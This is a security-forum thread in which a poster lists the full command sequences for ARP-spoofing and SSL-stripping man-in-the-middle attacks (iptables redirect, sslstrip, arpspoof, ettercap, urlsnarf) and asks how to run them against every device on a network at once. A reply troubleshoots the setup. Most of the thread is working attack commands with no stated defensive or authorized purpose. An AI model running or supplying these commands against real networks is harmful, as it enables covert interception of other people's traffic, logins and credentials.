Jump to content

MITM attack on whole network


Recommended Posts


I was always able to do a mitm attack targetting a specific IP and using sslstrip, ettercap, arpspoof, ...

But today I tried (for the first time) to do the whole network at once and it was like sslstrip wasn't doing anything. No errors whatsoever and yet all I could see was the usual "sslstrip 0.9 by Moxie Marlinspike" and then nothing.

When I target one computer I usually do something like:

echo 1 > /proc/sys/net/ipv4/ip_forward

iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000
sslstrip -a -k -f

arpspoof -i wlan0 -t <targetIP> -r <gatewayIP>

ettercap -Tq -L etterlogs -i wlan0

urlsnarf -v -i wlan0

and it works. To do the whole network I tried the same only replacing the <targetIP> by the Bcast (ie I think one time it said "couldn't arp for ..."

So then I tried method 2:

echo 1 > /proc/sys/net/ipv4/ip_forward
iptables -t nat -A PREROUTING -p tcp --dport 80 -j REDIRECT --to-port 10000
ettercap -T -q -i wlan0 -M ARP:REMOTE // //

sslstrip -a -l 10000

urlsnarf -i wlan0

It ran I think but nothing happened and I couldn't see the traffic.

What am I doing wrong? I'm not very experienced at this and if anyone knows a better way to do an sslstrip on the whole network I'd be grateful. I have the latest version of Kali btw.


Link to comment
Share on other sites

  • 3 weeks later...

The advice to look at wireshark seconded.

One thing that might be the problem here is that you've accidentally targeted your own machine in the arp-spoofing part of your attack. So when you want to send on traffic to the gateway machine, your machine will send it back to itself, thinking it's transmitting the packet to the gateway. Result is an endless loop rather than a flow of data that ssl-strip can work with.

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

  • Recently Browsing   0 members

    • No registered users viewing this page.
  • Create New...